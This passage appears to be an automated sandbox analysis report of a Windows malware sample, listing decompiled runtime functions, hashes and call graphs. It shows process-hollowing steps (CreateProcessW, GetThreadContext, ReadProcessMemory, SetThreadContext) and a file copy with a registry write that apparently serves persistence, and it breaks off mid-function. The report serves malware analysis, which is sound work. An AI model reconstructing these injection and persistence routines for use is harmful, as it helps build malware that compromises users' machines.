														E00285760(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E00283CF8(__eflags))) = 0x22;
													L4:
													E00283CA6();
													goto L5;
												}
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t126 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t120 = _t50;
													_t101 = _t109;
												} else {
													_t120 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t120;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_push(E002856B8(_t126)); // executed
												_t98 = E002855C2(_t109, _t124, _t126, __eflags); // executed
												_t127 = _t127 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t126 + 0xc;
													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t126 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t125 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t125 = _t104;
										}
										__eflags = _t125 - _v8;
										if(_t125 > _v8) {
											goto L41;
										} else {
											E002856DE(_v12, _v8,  *_t126, _t125);
											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
											 *_t126 =  *_t126 + _t125;
											_v12 = _v12 + _t125;
											_t109 = _t109 - _t125;
											_t127 = _t127 + 0x10;
											_v8 = _v8 - _t125;
											_t124 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t123;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E00283CF8(_t131))) = 0x16;
					goto L4;
				}
			}


























                    0x00282e7d
                    0x00282e81
                    0x00282e86
                    0x00282e89
                    0x00282e8c
                    0x00282e91
                    0x00282ead
                    0x00000000
                    0x00282e99
                    0x00282e99
                    0x00282e9b
                    0x00282eb4
                    0x00282eb7
                    0x00282eb9
                    0x00282ec7
                    0x00282ec7
                    0x00282eca
                    0x00282ed0
                    0x00282ed5
                    0x00282ed5
                    0x00282ed8
                    0x00282eda
                    0x00000000
                    0x00282edc
                    0x00282ee3
                    0x00282ee6
                    0x00000000
                    0x00000000
                    0x00282ee8
                    0x00282ee8
                    0x00282eec
                    0x00282ef3
                    0x00282ef6
                    0x00282ef8
                    0x00282f02
                    0x00282efa
                    0x00282efd
                    0x00282efd
                    0x00282f09
                    0x00282f0b
                    0x00282feb
                    0x00000000
                    0x00282f11
                    0x00282f11
                    0x00282f11
                    0x00282f18
                    0x00282f5e
                    0x00282f5e
                    0x00282f61
                    0x00282fc0
                    0x00282fc6
                    0x00282fc9
                    0x0028301d
                    0x00000000
                    0x00283023
                    0x00282fcb
                    0x00282fcf
                    0x00282ff3
                    0x00282ff3
                    0x00282ff7
                    0x00283001
                    0x00283006
                    0x0028300e
                    0x00282ea8
                    0x00282ea8
                    0x00000000
                    0x00282ea8
                    0x00282fd4
                    0x00282fd7
                    0x00282fdc
                    0x00282fdd
                    0x00282fdd
                    0x00282fdd
                    0x00282fe0
                    0x00000000
                    0x00282fe0
                    0x00282f63
                    0x00282f67
                    0x00282f88
                    0x00282f8d
                    0x00282f8f
                    0x00282f91
                    0x00282f91
                    0x00282f69
                    0x00282f70
                    0x00282f72
                    0x00282f7f
                    0x00282f7f
                    0x00282f7f
                    0x00282f82
                    0x00282f74
                    0x00282f76
                    0x00282f79
                    0x00282f79
                    0x00282f84
                    0x00282f84
                    0x00282f93
                    0x00282f96
                    0x00000000
                    0x00282f98
                    0x00282f98
                    0x00282f99
                    0x00282fa3
                    0x00282fa4
                    0x00282fa9
                    0x00282fac
                    0x00282fae
                    0x0028302b
                    0x00000000
                    0x0028302b
                    0x00282fb0
                    0x00282fb3
                    0x00283019
                    0x00283019
                    0x00283019
                    0x00283019
                    0x00000000
                    0x00283019
                    0x00282fb5
                    0x00282fb8
                    0x00282fba
                    0x00000000
                    0x00282fba
                    0x00282f96
                    0x00282f1a
                    0x00282f1d
                    0x00282f1f
                    0x00000000
                    0x00000000
                    0x00282f21
                    0x00000000
                    0x00000000
                    0x00282f27
                    0x00282f29
                    0x00282f2b
                    0x00282f2d
                    0x00282f2d
                    0x00282f2f
                    0x00282f32
                    0x00000000
                    0x00282f38
                    0x00282f41
                    0x00282f46
                    0x00282f49
                    0x00282f4b
                    0x00282f4e
                    0x00282f50
                    0x00282f53
                    0x00282f56
                    0x00282f56
                    0x00282fe3
                    0x00282fe3
                    0x00282fe3
                    0x00000000
                    0x00282f11
                    0x00282f0b
                    0x00282eda
                    0x00282ec0
                    0x00282ec2
                    0x00282ec5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00282ec5
                    0x00282e9d
                    0x00282ea2
                    0x00000000
                    0x00282ea2

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                    • String ID: L)(
                    • API String ID: 4048096073-4147288743
                    • Opcode ID: e1879961a99f507c14c04207bb93430f685d5d6a89d1b6176f8fdab3d4404e37
                    • Instruction ID: 62d10751acd7e7c80dc3ffb0d9d343e068a95c7503e4b14380295952314333a9
                    • Opcode Fuzzy Hash: e1879961a99f507c14c04207bb93430f685d5d6a89d1b6176f8fdab3d4404e37
                    • Instruction Fuzzy Hash: 9851E739A22206DFCB24FFA9C84465EB7B5AF50320F248629F825A65D0D7709E78DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F020A Relevance: 10.6, APIs: 7, Instructions: 147filememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 162 5f020a-5f02e6 call 5f005f call 5f0073 * 8 PathFileExistsW 182 5f02ec-5f0307 CreateFileW 162->182 183 5f0373-5f0379 162->183 184 5f030d-5f0316 182->184 185 5f0309-5f030b 182->185 184->185 187 5f0318-5f032c VirtualAlloc 184->187 185->183 187->185 188 5f032e-5f033b ReadFile 187->188 188->185 189 5f033d-5f0368 FindCloseChangeNotification CreateFileW WriteFile 188->189 190 5f036d-5f0371 189->190 191 5f036a-5f036c 189->191 190->183 191->190
                    APIs
                    • PathFileExistsW.KERNELBASE(?), ref: 005F02E1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005F02FF
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 005F0324
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 005F0336
                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 005F033E
                    • CreateFileW.KERNELBASE(?,40000000,00000007,00000000,00000001,00000080,00000000), ref: 005F0354
                    • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 005F0363
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: File$Create$AllocChangeCloseExistsFindNotificationPathReadVirtualWrite
                    • String ID:
                    • API String ID: 2600930906-0
                    • Opcode ID: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                    • Instruction ID: a5d35c4a137ec97f0489de6df6c4ac683d01aeb4a582db1c3767c5dbb14e5339
                    • Opcode Fuzzy Hash: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                    • Instruction Fuzzy Hash: E0416075A00209BAEB109FF49C59FBFBA7CEF44750F14591AFA10F61D1EA788A008769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F08EF Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 193 5f08ef-5f090a call 5f005f 196 5f090d-5f0911 193->196 197 5f0929-5f0936 196->197 198 5f0913-5f0927 196->198 199 5f0939-5f093d 197->199 198->196 200 5f093f-5f0953 199->200 201 5f0955-5f0962 199->201 200->199 202 5f0965-5f0969 201->202 203 5f096b-5f097f 202->203 204 5f0981-5f0a5f call 5f0073 * 8 202->204 203->202 221 5f0a76 204->221 222 5f0a61-5f0a6b 204->222 224 5f0a7a-5f0a96 221->224 222->221 223 5f0a6d-5f0a74 222->223 223->224 226 5f0a9f 224->226 227 5f0a98-5f0a9a 224->227 229 5f0aa6-5f0ace CreateProcessW 226->229 228 5f0e19-5f0e1c 227->228 230 5f0ad5-5f0aee GetThreadContext 229->230 231 5f0ad0 229->231 233 5f0af5-5f0b12 ReadProcessMemory 230->233 234 5f0af0 230->234 232 5f0dcd-5f0dd1 231->232 237 5f0e16-5f0e18 232->237 238 5f0dd3-5f0dd7 232->238 235 5f0b19-5f0b22 233->235 236 5f0b14 233->236 234->232 239 5f0b49-5f0b68 call 5f1b38 235->239 240 5f0b24-5f0b33 235->240 236->232 237->228 241 5f0dea-5f0dee 238->241 242 5f0dd9-5f0de4 238->242 255 5f0b6f-5f0b90 call 5f1c52 239->255 256 5f0b6a 239->256 240->239 243 5f0b35-5f0b42 call 5f1aa3 240->243 245 5f0df6-5f0dfa 241->245 246 5f0df0 241->246 242->241 243->239 259 5f0b44 243->259 247 5f0dfc 245->247 248 5f0e02-5f0e06 245->248 246->245 247->248 252 5f0e08-5f0e0d call 5f1aa3 248->252 253 5f0e12-5f0e14 248->253 252->253 253->228 261 5f0bd5-5f0bf5 call 5f1c52 255->261 262 5f0b92-5f0b99 255->262 256->232 259->232 269 5f0bfc-5f0c11 call 5f00da 261->269 270 5f0bf7 261->270 263 5f0b9b-5f0bc7 call 5f1c52 262->263 264 5f0bd0 262->264 271 5f0bce 263->271 272 5f0bc9 263->272 264->232 275 5f0c1a-5f0c24 269->275 270->232 271->261 272->232 276 5f0c56-5f0c5a 275->276 277 5f0c26-5f0c54 call 5f00da 275->277 279 5f0d3a-5f0d56 call 5f18f1 276->279 280 5f0c60-5f0c6e 276->280 277->275 287 5f0d5a-5f0d7b SetThreadContext 279->287 288 5f0d58 279->288 280->279 283 5f0c74-5f0c82 280->283 283->279 286 5f0c88-5f0ca8 283->286 289 5f0cab-5f0caf 286->289 290 5f0d7f-5f0d89 call 5f19f2 287->290 291 5f0d7d 287->291 288->232 289->279 292 5f0cb5-5f0cca 289->292 298 5f0d8d-5f0d91 290->298 299 5f0d8b 290->299 291->232 294 5f0cdc-5f0ce0 292->294 296 5f0d1d-5f0d35 294->296 297 5f0ce2-5f0cee 294->297 296->289 300 5f0d1b 297->300 301 5f0cf0-5f0d19 297->301 303 5f0d99-5f0d9d 298->303 304 5f0d93 298->304 299->232 300->294 301->300 305 5f0d9f 303->305 306 5f0da5-5f0da9 303->306 304->303 305->306 307 5f0dab 306->307 308 5f0db1-5f0db5 306->308 307->308 309 5f0db7-5f0dbc call 5f1aa3 308->309 310 5f0dc1-5f0dc7 308->310 309->310 310->229 310->232
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID: D
                    • API String ID: 0-2746444292
                    • Opcode ID: db68dab1a240d278936f63ba377a3d5ca14d2d2a84f4b809fa87d1be2830c529
                    • Instruction ID: f16782f000780bc64888abf9ea0919206425a07a6948f7eac35aba9591d46ce6
                    • Opcode Fuzzy Hash: db68dab1a240d278936f63ba377a3d5ca14d2d2a84f4b809fa87d1be2830c529
                    • Instruction Fuzzy Hash: 9E02D170A0020DEFDB14DF94CD89BBDBBB5BF04305F285459E615AA2A2D778AE80DF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 002866B4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 352 2866b4-2866c3 GetEnvironmentStringsW 353 2866c9-2866cc 352->353 354 2866c5-2866c8 352->354 355 2866de-2866e6 call 286c85 353->355 356 2866ce-2866d4 353->356 359 2866eb-2866f0 355->359 356->356 357 2866d6-2866dc 356->357 357->355 357->356 360 2866ff-28670a call 2898b0 359->360 361 2866f2-2866fe FreeEnvironmentStringsW 359->361 360->361
                    C-Code - Quality: 100%
                    			E002866B4() {
				WCHAR* _t2;
				void* _t4;
				void* _t15;
				WCHAR* _t17;

				_t2 = GetEnvironmentStringsW();
				_t17 = _t2;
				if(_t17 != 0) {
					if( *_t17 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t2 =  &(_t2[1]);
							} while ( *_t2 != 0);
							_t2 =  &(_t2[1]);
						} while ( *_t2 != 0);
					}
					_t1 = _t2 - _t17 + 2; // -2
					_t10 = _t1;
					_t4 = E00286C85(_t1); // executed
					_t15 = _t4;
					if(_t15 != 0) {
						E002898B0(_t15, _t17, _t10);
					}
					FreeEnvironmentStringsW(_t17);
					return _t15;
				} else {
					return 0;
				}
			}







                    0x002866b7
                    0x002866bd
                    0x002866c3
                    0x002866cc
                    0x00000000
                    0x002866ce
                    0x002866ce
                    0x002866ce
                    0x002866ce
                    0x002866d1
                    0x002866d6
                    0x002866d9
                    0x002866ce
                    0x002866e1
                    0x002866e1
                    0x002866e6
                    0x002866eb
                    0x002866f0
                    0x00286702
                    0x00286707
                    0x002866f3
                    0x002866fe
                    0x002866c5
                    0x002866c8
                    0x002866c8

                    APIs
                    • GetEnvironmentStringsW.KERNEL32(00000000,002834C3), ref: 002866B7
                    • __malloc_crt.LIBCMT ref: 002866E6
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002866F3
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EnvironmentStrings$Free__malloc_crt
                    • String ID:
                    • API String ID: 237123855-0
                    • Opcode ID: bc6fc62333d36050dd4628a73c3a3684cfb70bb877455379f8253cc3b861cb8a
                    • Instruction ID: bcaabd3be9ac1cb0bb9c4001a32e45f8ee12cb551e5e2380e89b971fcad1fe64
                    • Opcode Fuzzy Hash: bc6fc62333d36050dd4628a73c3a3684cfb70bb877455379f8253cc3b861cb8a
                    • Instruction Fuzzy Hash: 75F0827F9225729E9B317F34BC4E867263EDED136031A4426F402D3194FA648DA587A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F0422 Relevance: 4.9, APIs: 3, Instructions: 391registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 364 5f0422-5f077a call 5f005f call 5f0073 * 13 399 5f077e-5f0784 364->399 399->399 400 5f0786-5f079c 399->400 402 5f08e4 400->402 403 5f07a2-5f07b0 400->403 404 5f08e6-5f08ec 402->404 403->402 406 5f07b6-5f07d8 403->406 406->402 409 5f07de-5f07f5 406->409 409->402 411 5f07fb-5f0811 409->411 413 5f0823-5f0831 call 5f037c 411->413 414 5f0813-5f081e 411->414 413->402 418 5f0837-5f084c call 5f020a 413->418 414->404 418->402 421 5f0852-5f0858 418->421 422 5f085e-5f0879 RegGetValueW 421->422 422->402 423 5f087b-5f0895 RegOpenKeyExW 422->423 423->422 424 5f0897-5f08d7 RegSetValueExW 423->424 424->402 428 5f08d9-5f08e2 424->428 428->404
                    APIs
                      • Part of subcall function 005F037C: PathFileExistsW.KERNELBASE(?), ref: 005F0406
                      • Part of subcall function 005F037C: CreateDirectoryW.KERNELBASE(?,00000000), ref: 005F0412
                      • Part of subcall function 005F020A: PathFileExistsW.KERNELBASE(?), ref: 005F02E1
                      • Part of subcall function 005F020A: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005F02FF
                    • RegGetValueW.KERNELBASE(80000001,?,?,0000FFFF,00000000,00000000,00000000), ref: 005F0875
                    • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020006,?), ref: 005F0891
                    • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,00000103), ref: 005F08CF
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: File$CreateExistsPathValue$DirectoryOpen
                    • String ID:
                    • API String ID: 3065547873-0
                    • Opcode ID: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                    • Instruction ID: 448aa9b11c8271fa5b2707ab66e172a5fc67df44edbefa6f1954b80b55b60075
                    • Opcode Fuzzy Hash: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                    • Instruction Fuzzy Hash: 61D17D21E1435CA9EB20DBF0DC45BBEB778FF44740F10649BE608EB191E7B54A848B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0028A591 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 430 28a591-28a59b 431 28a5b8-28a5c1 430->431 432 28a59d-28a5a7 430->432 433 28a5c3 431->433 434 28a5c4-28a5c9 431->434 432->431 435 28a5a9-28a5b7 call 283cf8 432->435 433->434 436 28a5cb-28a5dc RtlAllocateHeap 434->436 437 28a5de-28a5e5 434->437 436->437 440 28a610-28a612 436->440 441 28a603-28a608 437->441 442 28a5e7-28a5f0 call 28a030 437->442 441->440 444 28a60a 441->444 442->434 446 28a5f2-28a5f7 442->446 444->440 447 28a5f9 446->447 448 28a5ff-28a601 446->448 447->448 448->440
                    C-Code - Quality: 86%
                    			E0028A591(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x295a6c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x295f5c;
					if( *0x295f5c == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E0028A030(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00283CF8(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                    0x0028a596
                    0x0028a59b
                    0x0028a5b8
                    0x0028a5bd
                    0x0028a5bf
                    0x0028a5c1
                    0x0028a5c3
                    0x0028a5c3
                    0x0028a5c3
                    0x00000000
                    0x0028a5cb
                    0x0028a5d4
                    0x0028a5da
                    0x0028a5dc
                    0x00000000
                    0x00000000
                    0x0028a610
                    0x0028a612
                    0x00000000
                    0x0028a5de
                    0x0028a5de
                    0x0028a5e5
                    0x0028a603
                    0x0028a606
                    0x0028a608
                    0x0028a60a
                    0x0028a60a
                    0x0028a5e7
                    0x0028a5e8
                    0x0028a5ee
                    0x0028a5f0
                    0x0028a5c4
                    0x0028a5c4
                    0x0028a5c6
                    0x0028a5c9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0028a5f2
                    0x0028a5f2
                    0x0028a5f5
                    0x0028a5f7
                    0x0028a5f9
                    0x0028a5f9
                    0x0028a5ff
                    0x0028a5ff
                    0x0028a5f0
                    0x00000000
                    0x0028a59d
                    0x0028a5a1
                    0x0028a5a4
                    0x0028a5a7
                    0x00000000
                    0x0028a5a9
                    0x0028a5ae
                    0x0028a5b7
                    0x0028a5b7
                    0x0028a5a7
                    0x00000000

                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,00282E0D,00000000,.(,00286CE0,?,.(,00000000,00000000,00000000,?,002868BA,00000001,00000214,?,002840A2), ref: 0028A5D4
                      • Part of subcall function 00283CF8: __getptd_noexit.LIBCMT ref: 00283CF8
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocateHeap__getptd_noexit
                    • String ID: .(
                    • API String ID: 328603210-3375098775
                    • Opcode ID: a0288b3d56fd080026c60d520206077bae1dfcf35c0249c2fb1e6e9f399ef1b3
                    • Instruction ID: 05ecab6c25a69aa0692501236fa3ad2099b6d1adf3358914308b86519dce7a02
                    • Opcode Fuzzy Hash: a0288b3d56fd080026c60d520206077bae1dfcf35c0249c2fb1e6e9f399ef1b3
                    • Instruction Fuzzy Hash: 4E01F5396232269AFF24BF25DC08B6A3758AB81360F05492BE805C75D0DF78C8608B51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F037C Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 449 5f037c-5f040b call 5f005f call 5f0073 * 3 PathFileExistsW 459 5f040d-5f0418 CreateDirectoryW 449->459 460 5f041a-5f041f 449->460 459->460
                    APIs
                    • PathFileExistsW.KERNELBASE(?), ref: 005F0406
                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 005F0412
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CreateDirectoryExistsFilePath
                    • String ID:
                    • API String ID: 2624722123-0
                    • Opcode ID: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                    • Instruction ID: 421a9fda6c3c64d580b1a809d7f59e2e93b289bf385f1ea3758311ee331db20c
                    • Opcode Fuzzy Hash: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                    • Instruction Fuzzy Hash: ED11E725A5430CB4EB10ABF0EC1AFBE6735EF80B10F10691BFA04EB1E1E6754A408399
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00283031 Relevance: 3.0, APIs: 2, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 461 283031-283045 call 283d50 464 283076 461->464 465 283047-28304a 461->465 466 283078-28307d call 283d95 464->466 465->464 467 28304c-28304f 465->467 469 28307e-283099 call 283652 call 282e75 467->469 470 283051-283055 467->470 482 28309e-2830b3 call 2830b5 469->482 473 283066-283071 call 283cf8 call 283ca6 470->473 474 283057-283063 call 285760 470->474 473->464 474->473 482->466
                    C-Code - Quality: 88%
                    			E00283031(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;

				_push(0xc);
				_push(0x291fe0);
				E00283D50(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E00283652( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E00282E75( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E002830B5();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E00285760( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
						}
						 *((intOrPtr*)(E00283CF8(_t41))) = 0x16;
						E00283CA6();
						goto L6;
					}
				}
				return E00283D95(_t19);
			}






                    0x00283031
                    0x00283033
                    0x00283038
                    0x0028303f
                    0x00283045
                    0x00283076
                    0x00283076
                    0x0028304c
                    0x0028304f
                    0x00283081
                    0x00283087
                    0x00283099
                    0x002830a1
                    0x002830a4
                    0x002830ab
                    0x002830b0
                    0x00283051
                    0x00283051
                    0x00283055
                    0x0028305e
                    0x00283063
                    0x0028306b
                    0x00283071
                    0x00000000
                    0x00283071
                    0x0028304f
                    0x0028307d

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: 3acf552402e448e53af1852a6ba4b5b59c61d4da5173e82e83201847de7a9b34
                    • Instruction ID: 2e61678833715394430cffa3a5e4ba289bc7205b5e0b938e9d9c7c946a76f696
                    • Opcode Fuzzy Hash: 3acf552402e448e53af1852a6ba4b5b59c61d4da5173e82e83201847de7a9b34
                    • Instruction Fuzzy Hash: 7B011E7982221AEBCF21FFA5C80289E7B61AF04B50F008125F828551E5D7768771DF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00283270 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00283270(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				signed int _t17;
				void* _t26;
				intOrPtr _t28;

				_push(0xc);
				_push(0x292000);
